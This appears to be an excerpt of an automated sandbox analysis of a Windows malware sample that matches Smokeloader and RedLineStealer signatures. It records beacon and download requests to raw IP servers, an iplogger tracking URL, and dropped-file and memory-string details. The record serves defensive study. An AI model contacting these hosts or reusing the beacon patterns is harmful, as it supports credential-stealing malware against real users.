00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1Pz8p7 Source: Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.orgx Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174  Source: unknown DNS traffic detected: queries for: iplogger.org  Source: global traffic HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache  Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2 ### E-Banking Fraud  Source: Yara match File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY ### System Summary  Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown  Source: file.exe, 00000000.00000003.348925452.0000000003B6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C$ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r Source: file.exe, 00000000.00000003.348371414.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r Source: soft[1].0.dr String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C$ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
 Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C28C2 33_2_00007FFBB00C28C2 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C2EE5 33_2_00007FFBB00C2EE5 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C1B2E 33_2_00007FFBB00C1B2E Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00CA91D 33_2_00007FFBB00CA91D Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C394F 33_2_00007FFBB00C394F Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C553E 33_2_00007FFBB00C553E Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C3F72 33_2_00007FFBB00C3F72 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C9B6D 33_2_00007FFBB00C9B6D Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C678F 33_2_00007FFBB00C678F Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C57D8 33_2_00007FFBB00C57D8 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C4601 33_2_00007FFBB00C4601 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C4EDD 33_2_00007FFBB00C4EDD
 Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
